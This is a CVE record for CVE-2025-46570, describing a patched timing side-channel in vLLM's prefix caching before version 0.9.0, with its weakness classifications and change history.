vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.
Metrics
Affected Vendors & Products
References
History
Tue, 24 Jun 2025 19:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
First Time appeared |
Vllm
Vllm vllm |
|
Weaknesses | CWE-203 | |
CPEs | cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* | |
Vendors & Products |
Vllm
Vllm vllm |
Fri, 30 May 2025 21:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
References |
| |
Metrics |
threat_severity
|
threat_severity
|
Thu, 29 May 2025 18:15:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Metrics |
ssvc
|
Thu, 29 May 2025 16:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Description | vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0. | |
Title | vLLM’s Chunk-Based Prefix Caching Vulnerable to Potential Timing Side-Channel | |
Weaknesses | CWE-208 | |
References |
| |
Metrics |
cvssV3_1
|

Status: PUBLISHED
Assigner: GitHub_M
Published:
Updated: 2025-05-29T18:05:10.768Z
Reserved: 2025-04-24T21:10:48.175Z
Link: CVE-2025-46570

Updated: 2025-05-29T18:05:04.545Z

Status : Analyzed
Published: 2025-05-29T17:15:21.327
Modified: 2025-06-24T18:25:31.883
Link: CVE-2025-46570
